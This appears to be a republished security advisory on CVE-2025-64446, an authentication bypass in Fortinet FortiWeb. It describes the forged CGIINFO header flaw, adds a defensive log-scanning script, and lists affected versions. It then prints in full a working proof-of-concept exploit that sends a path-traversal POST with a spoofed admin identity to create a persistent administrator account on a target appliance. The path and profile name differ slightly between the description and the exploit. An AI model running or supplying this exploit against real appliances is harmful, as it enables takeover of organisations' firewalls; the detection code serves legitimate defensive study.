
0x00 Introduction
FortiWeb is Fortinet's enterprise web application firewall (WAF), built to protect web applications and APIs against advanced threats. It incorporates AI and machine learning, using a two-layer detection engine (an HMM model and an SVM classifier) to identify anomalous traffic, and defends against the OWASP Top 10, SQL injection, XSS, DDoS and malicious bots. Its core features include automated API protection, virtual patching integration (compatible with third-party scanners such as Acunetix) and intelligent traffic analysis, with support for modern protocols such as HTTP/2 and WebSocket.
0x01 Vulnerability Description
An attacker can send a crafted HTTP POST request to the endpoint
/api/v2.0/cmd/system/admin%3F/../../../../../cgi-bin/fwbcgi
and thereby abuse a flaw in the authentication logic of the cgi_auth() function in the fwbcgi binary: the function does not verify the caller's identity itself, but accepts it from a client-supplied, base64-encoded CGIINFO HTTP header, from which it extracts four key fields: username, profname, vdom and loginname.
Because the built-in admin account has the same immutable attributes on every FortiWeb appliance, an attacker can construct a JSON object carrying those attributes (for example {"username":"admin","profname":"super_admin","vdom":"root","loginname":"admin"}) to impersonate it. Once cgi_auth() has processed that header, the attacker holds full administrator privileges and can execute arbitrary commands, including creating a persistent administrator account with known credentials.
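From a defender's side, the mechanism described above leaves two signals in request logs: a percent-encoded path that resolves to /cgi-bin/fwbcgi although it was submitted under /api/, and a CGIINFO header arriving from an external client at all. The Python below is an added example, not part of this advisory or of the watchTowr tool: it resolves the encoded traversal to the path the backend actually reaches (using the request path from the published POC), decodes a CGIINFO header into the four fields cgi_auth() consumes, flags matching requests, and checks a reported FortiWeb build against the affected version ranges listed in this advisory. The log line format and the sample entries are constructed for the example, and whether your reverse proxy actually records the CGIINFO header is an assumption you must verify against your own logging configuration.

```python
import base64
import json
import posixpath
import re
from urllib.parse import unquote

# Affected FortiWeb version ranges, inclusive, as listed in this advisory.
AFFECTED_RANGES = [
    ((8, 0, 0), (8, 0, 1)),
    ((7, 6, 0), (7, 6, 4)),
    ((7, 4, 0), (7, 4, 9)),
    ((7, 2, 0), (7, 2, 11)),
    ((7, 0, 0), (7, 0, 11)),
]

# Identity fields that cgi_auth() in fwbcgi reads from the CGIINFO header.
CGIINFO_FIELDS = ("username", "profname", "vdom", "loginname")


def parse_version(version):
    """'7.6.4' -> (7, 6, 4); raises ValueError for anything that is not dotted integers."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected(version):
    """True if the given FortiWeb version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def decode_cgiinfo(header_value):
    """Decode a base64 JSON CGIINFO header into the four identity fields.

    Returns None for anything that is not valid base64 JSON (binascii.Error and
    json.JSONDecodeError are both ValueError subclasses), so a malformed header
    never aborts log processing."""
    try:
        payload = json.loads(base64.b64decode(header_value, validate=True))
    except ValueError:
        return None
    if not isinstance(payload, dict):
        return None
    return {field: payload.get(field) for field in CGIINFO_FIELDS}


def normalize_path(raw_path):
    """Percent-decode the request path and resolve '..' segments, i.e. the path
    the backend ends up serving ('admin%3f/../../../../../cgi-bin/fwbcgi' -> '/cgi-bin/fwbcgi')."""
    return posixpath.normpath(unquote(raw_path))


# Constructed log format for this example: SRC "METHOD PATH" STATUS cgiinfo=VALUE
# (VALUE is '-' when the request carried no CGIINFO header).
LOG_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) cgiinfo=(?P<cgiinfo>\S+)$'
)


def analyze_request(line):
    """Return a finding dict if the request shows either CVE-2025-64446 signal, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path = m.group("path")
    resolved = normalize_path(raw_path)
    # Signal 1: the path was submitted under some other prefix but resolves to fwbcgi.
    traversal_to_fwbcgi = resolved == "/cgi-bin/fwbcgi" and not raw_path.startswith("/cgi-bin/")
    # Signal 2: a client-supplied CGIINFO header (an internal identity header) is present.
    has_cgiinfo = m.group("cgiinfo") != "-"
    if not traversal_to_fwbcgi and not has_cgiinfo:
        return None
    return {
        "src": m.group("src"),
        "raw_path": raw_path,
        "resolved_path": resolved,
        "traversal_to_fwbcgi": traversal_to_fwbcgi,
        "claimed_identity": decode_cgiinfo(m.group("cgiinfo")) if has_cgiinfo else None,
        "status": int(m.group("status")),
    }


def scan_log(lines):
    """Run analyze_request over an iterable of log lines and collect the findings."""
    return [finding for finding in (analyze_request(line) for line in lines) if finding]


# Constructed sample log: one benign request, one matching the POC's request shape,
# and one carrying an undecodable CGIINFO value (flagged, identity unknown).
_IMPERSONATION = base64.b64encode(json.dumps(
    {"username": "admin", "profname": "prof_admin", "vdom": "root", "loginname": "admin"}
).encode()).decode()
SAMPLE_LOG = [
    '10.0.0.5 "GET /api/v2.0/cmdb/system/status" 200 cgiinfo=-',
    f'198.51.100.7 "POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi" 200 cgiinfo={_IMPERSONATION}',
    '203.0.113.9 "GET /api/v2.0/cmdb/system/status" 200 cgiinfo=!!not-base64!!',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print("7.6.4 affected:", is_affected("7.6.4"), "| 7.6.5 affected:", is_affected("7.6.5"))
```

A hit with traversal_to_fwbcgi set and a claimed_identity of username admin is the combination the advisory describes; a CGIINFO header from an external source with any content is already worth a ticket, since that header should never originate outside the appliance.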
0x02 CVE ID
CVE-2025-64446
0x03 Affected Versions
Fortinet FortiWeb 8.0.0-8.0.1
FortiWeb 7.6.0-7.6.4
FortiWeb 7.4.0-7.4.9
FortiWeb 7.2.0-7.2.11
FortiWeb 7.0.0-7.0.11
0x04 Vulnerability Details
POC:
https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass
import http.client
import ssl
import base64
import json
from uuid import uuid4
import sys

banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-Fortiweb-AuthBypass.py
(*) FortiWeb Authentication Bypass Artifact Generator
- Sina Kheirkhah (@SinSinology) and Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-xxxxx]
"""
print(banner)

if len(sys.argv) != 2:
    print("Usage: python3 watchTowr-vs-Fortiweb-AuthBypass.py <target_fortiweb_ip>")
    sys.exit(1)

# Name and password of the account to be created: first 8 characters of a random UUID
user = str(uuid4())[:8]
passwd = user
host = sys.argv[1]

# Encoded '?' followed by '..' segments: the request is routed to the fwbcgi CGI binary
raw_path = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi"

# Identity that cgi_auth() accepts from the client-supplied CGIINFO header
cgiinfo_json = {
    "username": "admin",
    "profname": "prof_admin",
    "vdom": "root",
    "loginname": "admin"
}
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()

headers = {
    "CGIINFO": cgiinfo_b64,
    "Content-Type": "application/x-www-form-urlencoded",
}

# Request body: a new local administrator with the prof_admin access profile
body = {
    "data": {
        "q_type": 1,
        "name": user,
        "access-profile": "prof_admin",
        "access-profile_val": "0",
        "trusthostv4": "0.0.0.0/0",
        "trusthostv6": "::/0",
        "last-name": "",
        "first-name": "",
        "email-address": "",
        "phone-number": "",
        "mobile-number": "",
        "hidden": 0,
        "comments": "",
        "sz_dashboard": -1,
        "type": "local-user",
        "type_val": "0",
        "admin-usergrp_val": "0",
        "wildcard_val": "0",
        "accprofile-override_val": "0",
        "sshkey": "",
        "passwd-set-time": 0,
        "history-password-pos": 0,
        "history-password0": "",
        "history-password1": "",
        "history-password2": "",
        "history-password3": "",
        "history-password4": "",
        "history-password5": "",
        "history-password6": "",
        "history-password7": "",
        "history-password8": "",
        "history-password9": "",
        "force-password-change": "disable",
        "force-password-change_val": "0",
        "password": passwd
    }
}
body_data = json.dumps(body)

# Certificate verification is disabled because appliances commonly present self-signed certificates
context = ssl._create_unverified_context()
conn = http.client.HTTPSConnection(host, 443, context=context)
conn.request("POST", raw_path, body=body_data, headers=headers)
resp = conn.getresponse()

if resp.status == 200:
    print("[+] Exploit sent successfully.")
    print(f"[*] Check for the new user [ {user} ] with password [ {passwd} ]")
else:
    print("[-] Exploit failed. Status Code:", resp.status)
0x05 References
https://fortiguard.fortinet.com/psirt/FG-IR-25-910
Recommended reading:
CVE-2025-25256 | Fortinet FortiSIEM remote command execution vulnerability (POC)
CVE-2025-25257 | Fortinet FortiWeb SQL injection vulnerability (POC)
CVE-2025-32756 | Remote code execution vulnerability in multiple Fortinet products (POC)
PS: This account shares domestic and international security news. You are welcome to share and repost, but please keep the article intact. If the article contains sensitive information or infringing content, contact the author to have it removed. Information security is a long road; thank you for your support.